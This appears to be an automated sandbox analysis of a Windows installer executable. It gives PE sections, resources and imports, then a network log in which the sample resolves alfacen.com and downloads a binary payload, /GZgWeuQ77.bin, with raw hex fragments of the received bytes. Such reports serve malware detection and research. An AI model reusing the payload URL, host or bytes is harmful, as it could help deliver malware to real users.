IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65ef | 0x6600 | a7ac317f30d043d93d4c5978f973de39 | False | 0.6750919117647058 | data | 6.514810500836391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2aff8 | 0x600 | d113e76cc1b8c0774c4702688d79d792 | False | 0.5162760416666666 | data | 4.036693470004838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6a000 | 0x34908 | 0x34a00 | d09097303c9883a16609d6cfc168ddcd | False | 0.5725671763657957 | data | 6.134346545573802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x6a400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x6a768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.39200579675854724
RT_ICON | 0x7af90 | 0xc890 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9980328762854472
RT_ICON | 0x87820 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.46636535631700654
RT_ICON | 0x90cc8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.49302218114602586
RT_ICON | 0x96150 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.4863013698630137
RT_ICON | 0x9a378 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.46473029045643155
RT_ICON | 0x9c920 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.550187617260788
RT_ICON | 0x9d9c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.4095744680851064
RT_DIALOG | 0x9de30 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x9df78 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x9e0b8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x9e1b8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x9e2d8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x9e3a0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x9e400 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x9e478 | 0x14c | Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | United States | 0.5813253012048193
RT_MANIFEST | 0x9e5c8 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384

Imports
DLL: Imported functions
KERNEL32.dll: SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll: GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll: SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll: SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll: AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll: ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll: OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 19:16:54.749670029 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:54.749706984 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:54.749774933 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:54.760015965 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:54.760037899 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:55.883717060 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:55.883912086 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:55.939806938 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:55.939834118 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:55.940140963 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:55.944122076 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:55.946728945 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:55.991406918 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.278723955 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.278743982 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.278917074 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.278943062 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.279066086 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.429131031 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.429214001 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.450164080 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.450248003 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.451704025 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.451767921 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.581526041 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.581617117 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.581753969 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.581753969 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.581773043 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.584146023 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.620882034 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.621105909 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.621690035 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.621766090 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.622195959 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.622267008 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.622946024 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.623018026 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.623905897 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.623975039 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.737299919 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.737384081 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.737530947 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.737591028 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.737965107 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.738022089 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.771053076 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.771131039 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.791899920 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.791976929 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.792059898 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.792109966 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.792860985 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.792912006 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.793685913 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.793735981 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.794164896 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.794219017 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.794358969 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.794416904 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.795128107 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.795181036 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.795277119 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.795325994 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.796266079 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.796324968 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.796912909 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.796972036 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.896306992 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.896359921 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.896398067 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.896413088 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.896441936 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.896466970 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.896532059 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.896581888 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.896599054 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.896646976 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.897063017 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.897121906 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.897270918 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.897325993 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.929117918 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.929219961 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.978035927 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.978118896 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.978137016 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.978190899 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.978213072 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.978266954 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.978298903 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.978346109 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.978353024 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.978375912 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Oct 20, 2024 19:16:56.978389025 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:56.978416920 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:57.116553068 CEST | 49974 | 443 | 192.168.2.5 | 193.107.36.30
Oct 20, 2024 19:16:57.116588116 CEST | 443 | 49974 | 193.107.36.30 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 19:16:54.636404037 CEST | 57827 | 53 | 192.168.2.5 | 1.1.1.1
Oct 20, 2024 19:16:54.742644072 CEST | 53 | 57827 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 20, 2024 19:16:54.636404037 CEST | 192.168.2.5 | 1.1.1.1 | 0xf38a | Standard query (0) | alfacen.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 20, 2024 19:16:54.742644072 CEST | 1.1.1.1 | 192.168.2.5 | 0xf38a | No error (0) | alfacen.com | | 193.107.36.30 | A (IP address) | IN (0x0001) | false
                                                            • alfacen.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49974 | 193.107.36.30 | 443 | 5704 | C:\Users\user\Desktop\450707124374000811.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-20 17:16:55 UTC | 161 | OUT | GET /GZgWeuQ77.bin HTTP/1.1
User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: alfacen.com
Cache-Control: no-cache
2024-10-20 17:16:56 UTC | 344 | IN | HTTP/1.1 200 OK
Date: Sun, 20 Oct 2024 17:16:56 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Fri, 18 Oct 2024 09:43:46 GMT
Accept-Ranges: bytes
Content-Length: 287296
Cache-Control: max-age=2592000
Expires: Tue, 19 Nov 2024 17:16:56 GMT
Vary: Accept-Encoding
Content-Type: application/octet-stream
2024-10-20 17:16:56 UTC | 7848 | IN | Data Raw: cf c5 f8 ac f6 67 ef 06 07 f8 37 69 71 e5 d0 63 6e a7 11 60 13 f7 7c 32 98 d3 07 17 1b 04 21 a6 fc 61 21 db 82 0c 0c ba 46 57 13 cc dd 2f ce bd 43 43 ef 35 7d c0 fc 24 73 28 81 73 c3 a6 69 98 93 d8 f3 4e 6a c2 71 51 f0 c6 fc 07 f8 50 07 e1 0b f0 b4 20 98 33 d0 3c 0c 3c f2 a4 e0 52 c3 85 c1 ae f3 a8 58 8c e1 13 e9 10 56 32 c1 ed e1 41 3e 19 b6 c3 22 30 78 90 98 2a 46 7c d9 95 0d 4f 3b 89 7f d3 95 f3 70 38 31 fd 3c e2 2b b2 8e bc 0f f7 d6 61 4a 63 12 42 09 e3 2c 28 3e 2a 77 4f 82 c5 9d 08 51 bc d0 b0 72 ed cf 50 f3 4a 6b 0c 78 44 57 39 ba 8a 63 81 20 63 93 0c 8e af 85 cf c2 c3 fc a9 90 62 3a b3 59 2d 6c bb ab fb 54 6e f1 22 30 66 97 3e 79 56 a5 5d 1f 0f e0 07 14 f9 2b e4 82 f2 c7 a6 e9 67 80 9f d7 69 d9 c4 b0 37 47 52 0a c3 02 fa 36 c0 87 ea 25 2d 64 c9 a9
Data Ascii: g7iqcn`|2!a!FW/CC5}$s(siNjqQP 3<<RXV2A>"0x*F|O;p81<+aJcB,(>*wOQrPJkxDW9c cb:Y-lTn"0f>yV]+gi7GR6%-d
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: 2c ce e6 06 e5 82 20 0b 06 93 db cf 18 ec ae 54 43 ca 88 70 a9 e1 bd 58 e5 d6 65 bc 1a f3 16 f4 b1 18 b0 5e 0f 1e 81 12 d3 d6 45 64 95 b8 78 50 9a 84 4f ec 12 72 a7 b8 d9 43 9f 7d ed 3b 31 2d 84 94 cc d8 0f 9e 75 cc 7f 6e 99 13 d4 61 ab bf 51 51 00 90 3a 67 14 91 53 3f 30 ea 39 c1 5d 2e 99 e4 39 e9 f7 78 f3 82 4d ab bc d6 a3 0e cf 16 47 02 d9 a8 f3 b5 78 d7 5e 01 b1 6f 57 26 fe 1d 62 73 ed e4 cf 08 b8 72 39 4b 3f 68 9b f2 a4 8d c3 06 d5 95 39 23 02 ec cb c9 d4 84 3a af d1 04 ef a8 c4 c1 33 31 de c6 cb cb 34 6a 55 a7 4b 28 44 90 05 6c fe 05 65 ea 02 76 3f 23 6e 9b c6 46 36 75 8f b2 9d 7c 80 68 d4 91 08 59 44 65 88 d5 29 b6 64 6c bc eb f9 a1 a0 0d 6c e7 14 30 9e 46 02 b8 3d 38 e9 f5 f9 d8 86 c7 b7 9c 52 ab fc de bb 45 d8 e8 a4 d8 c5 ec 5f ac 38 a6 7b c8 b9
Data Ascii: , TCpXe^EdxPOrC};1-unaQQ:gS?09].9xMGx^oW&bsr9K?h9#:314jUK(Dlev?#nF6u|hYDe)dll0F=8RE_8{
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: f2 ae 50 c3 29 22 6c ae a8 6f 37 25 0d 97 21 ca be 06 82 75 8d 66 e2 1a 63 c8 9c 4b 53 cb 8a 10 07 98 93 a6 25 11 92 cf 18 3b c1 7e f3 b1 cd a0 68 80 66 4d 7b 18 3e 3f fc f1 c2 4f 9d f4 7c 7c e4 ac c7 a6 87 2d 89 32 c3 a3 e7 7b 2a 63 aa 92 54 f4 ee 25 ef bd b7 8b 93 0a f1 1a a7 7f 35 dd af 3e 49 88 c1 61 01 15 5c 7a 2a c1 b5 23 87 a9 f8 24 fc d0 fb 6f f9 7d 64 92 47 b4 5d 2f 0d 8c e6 ef 97 04 51 96 a1 7b 61 65 8a 0e 0e 37 b4 31 05 39 ce 21 a1 3b be df ee de e0 5d 9d a4 85 cd 7e 9d c3 41 64 89 9e f9 8e 86 1c 07 59 5e fc 16 87 4e 73 56 a9 45 21 e8 2e d7 d6 0d 45 bb 11 5c c1 bc 29 1b fb d3 72 49 bf 9d 6a f2 bf 3b 17 b3 ec 53 d2 be 1b fa 46 79 5c db 4a d9 88 e2 0f c0 4d bf f0 44 37 41 e0 0c fd 9b 00 c1 a9 f3 a7 ce 23 50 84 f3 01 0f 19 fd e3 59 1b c9 9a 3c 2e
Data Ascii: P)"lo7%!ufcKS%;~hfM{>?O||-2{*cT%5>Ia\z*#$o}dG]/Q{ae719!;]~AdY^NsVE!.E\)rIj;SFy\JMD7A#PY<.
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: be 2e 90 bd 4d eb 72 de b5 1f ad 1b 04 2a 4f 2a ff 04 2b 12 c9 51 c6 db d3 49 dd 45 c9 ef d4 d9 ff ba b4 72 7e c6 23 82 1d 92 0c 69 c5 d0 b3 78 98 45 59 bc 94 20 07 9d 45 6c db 31 0a 84 e4 52 ed 6d 61 ec 6a 79 94 94 13 73 cd 49 e5 92 34 27 c4 0a b7 a7 85 00 5d d5 b0 11 8b bb 43 e1 45 7f 4c 91 d5 39 8f 83 a2 df 3c 42 c6 83 80 6c bc 94 41 36 d0 3a fa d9 a9 ab 64 2f 90 f9 7d a2 bb 12 10 d6 9e 20 d4 92 00 b4 98 d9 5c 11 44 bd d7 10 3d 3a 46 e2 bc dc 2c 14 72 6a b7 69 65 db 21 79 e6 82 72 d1 3d e2 01 aa 75 15 9d 72 90 7b a2 68 56 40 ea 3b 26 1f 6e 6c 67 7c ae 32 d8 17 c3 e0 cc 06 06 ba 90 7a e3 98 47 44 05 c0 3f 49 3b 00 e6 f1 2b a4 29 3b dc c5 a6 6c f6 31 f2 a7 f0 94 76 b4 89 5d c9 02 0b 85 7e 30 b9 ad ad a1 26 68 1f 7a f5 72 33 cc 39 01 e1 a2 02 d8 31 72 da
Data Ascii: .Mr*O*+QIEr~#ixEY El1RmajysI4']CEL9<BlA6:d/} \D=:F,rjie!yr=ur{hV@;&nlg|2zGD?I;+);l1v]~0&hzr391r
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: 0a 80 72 67 3f 68 36 16 a7 4c c3 2f 6d e8 4c d4 20 df 61 28 af ab 85 7c 0f 45 30 70 7d f5 d8 d6 2b f7 f2 c7 f9 c0 4b d5 e1 ba 76 ea 7e 00 1b 5c 94 9d fe 8b 99 74 62 17 c2 68 aa 4c 0b a4 37 ac 2d 17 63 43 8c 6d 85 82 79 aa 49 84 2a 62 2e 1e bc 77 27 5c d8 ee 9a 3d 9e be f0 55 b1 bc de 25 04 a6 fe 3e 62 c9 70 21 be b6 a2 f8 ed 99 63 81 2b d0 7e ed 61 fe 0c 9f b0 23 a2 06 92 3f 7f 06 90 6c 3b 38 43 e3 97 96 a8 0f 92 e5 5b b3 cc 06 6b 68 37 17 53 0c 1b ef 2e ba c7 dc e6 90 c7 0b fc 34 b2 7e bf bd 7c 7e f8 ce b7 e9 ac c4 57 e5 d0 cb 1d a2 55 c6 0c ee a1 04 2c 14 cc 9b 10 c5 cc 94 bf 4c 6e 6b cf b0 64 6c 60 53 f7 ae 51 c8 80 c2 a7 76 db 03 8b ff fe 1b 0e a5 a0 0b 37 72 aa 83 cc 02 e0 0c d0 59 16 21 ff 6a 73 a4 bc 97 3a 77 53 eb 2f 51 0b 6a a1 fe 44 99 c7 72 8f
Data Ascii: rg?h6L/mL a(|E0p}+Kv~\tbhL7-cCmyI*b.w'\=U%>bp!c+~a#?l;8C[kh7S.4~|~WU,Lnkdl`SQv7rY!js:wS/QjDr
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: f6 eb eb 54 c2 dd 5d ad c6 8a 8d 4d a2 88 8a db 68 2b 3a 35 24 86 28 8e f8 cb b4 3d 77 ef 6f f0 8d cd 43 a6 19 bb ce 67 ad c6 e4 f7 c0 be 27 89 15 0c 6e eb 30 ba b2 18 8a d0 e8 05 ac 7e aa 93 93 5e df 2c 66 0c 4a f6 39 c3 02 a0 b9 86 4f 66 47 3f 13 45 da a8 78 6c d1 82 56 8a fc 70 e6 58 74 30 d2 56 17 24 8d bd 00 a1 62 33 82 84 7e 92 ad 25 77 00 b0 89 d4 1b dc 75 1f 13 75 c1 32 e6 88 0d 5d 96 23 61 08 71 b4 98 b9 7b d0 d4 d8 21 b6 21 3e 6b 32 c2 08 ee 28 cb 08 74 b3 f6 9e 54 ad 5b 1e 00 31 0e 26 4f dd 06 22 f3 4a a7 84 64 a1 46 15 35 45 02 89 6b 22 58 ad 13 5a 51 4d ca 86 12 09 db 77 f1 04 fe 32 76 49 cd cf 79 76 4d cd 6f c9 c8 31 76 92 c1 49 32 4d 05 b9 26 55 83 70 e7 bc e7 75 33 53 a1 da d8 03 a1 31 57 c8 3c 28 23 62 75 22 90 a0 61 f8 13 29 09 ae b8 8b
Data Ascii: T]Mh+:5$(=woCg'n0~^,fJ9OfG?ExlVpXt0V$b3~%wuu2]#aq{!!>k2(tT[1&O"JdF5Ek"XZQMw2vIyvMo1vI2M&Upu3S1W<(#bu"a)
2024-10-20 17:16:56 UTC | 8000 | IN | Data Raw: 8d 1b 25 c3 75 d9 7d a0 e8 73 64 cc d7 33 b7 9c 88 90 32 d3 4b 6b 81 9b 73 08 d7 92 1d b8 b2 09 54 fa 3c c4 aa bb f3 cf d4 16 b4 70 61 0e 2e df 2a d4 b6 1b 2b 3e d3 0b 77 69 17 2d 79 20 22 b2 77 23 c4 d3 8f 6a 9b 63 ce c3 a3 de 1a 5a 93 4c 6a 3b 01 14 98 e3 fa 38 e2 cc 53 dc 83 94 24 0f d8 5c 85 f3 73 6b ec ca bb 03 61 ce 77 f6 9b f0 d9 02 61 aa e1 bd 1d 82 9b 28 a5 5c 98 2d a7 c6 e4 ed 2b f2 8d 5d 22 0b 0d d9 b4 f8 26 99 0e bc 13 d6 51 f4 4f f8 4c e5 ca 23 54 a1 f7 57 a7 7d da d8 a3 fb 60 cf 1b 27 ab 0b a9 f9 69 1e 77 20 04 d5 21 93 42 18 1e fc 78 f4 eb 98 30 3e 1e 99 b8 9b 3c ea 6d 0c b2 d9 80 38 04 91 1f 80 2f 3b 5c 2e 23 ba cf b9 ff eb 5d 11 fb c1 30 fb db ec cd b5 12 51 b5 0a 43 9a 69 1f 5e a8 30 ec b2 04 c4 55 f7 7a 14 39 0f eb 7f bc 75 fe ed 94 cc
Data Ascii: %u}sd32KksT<pa.*+>wi-y "w#jcZLj;8S$\skawa(\-+]"&QOL#TW}`'iw !Bx0><m8/;\.#]0QCi^0Uz9u
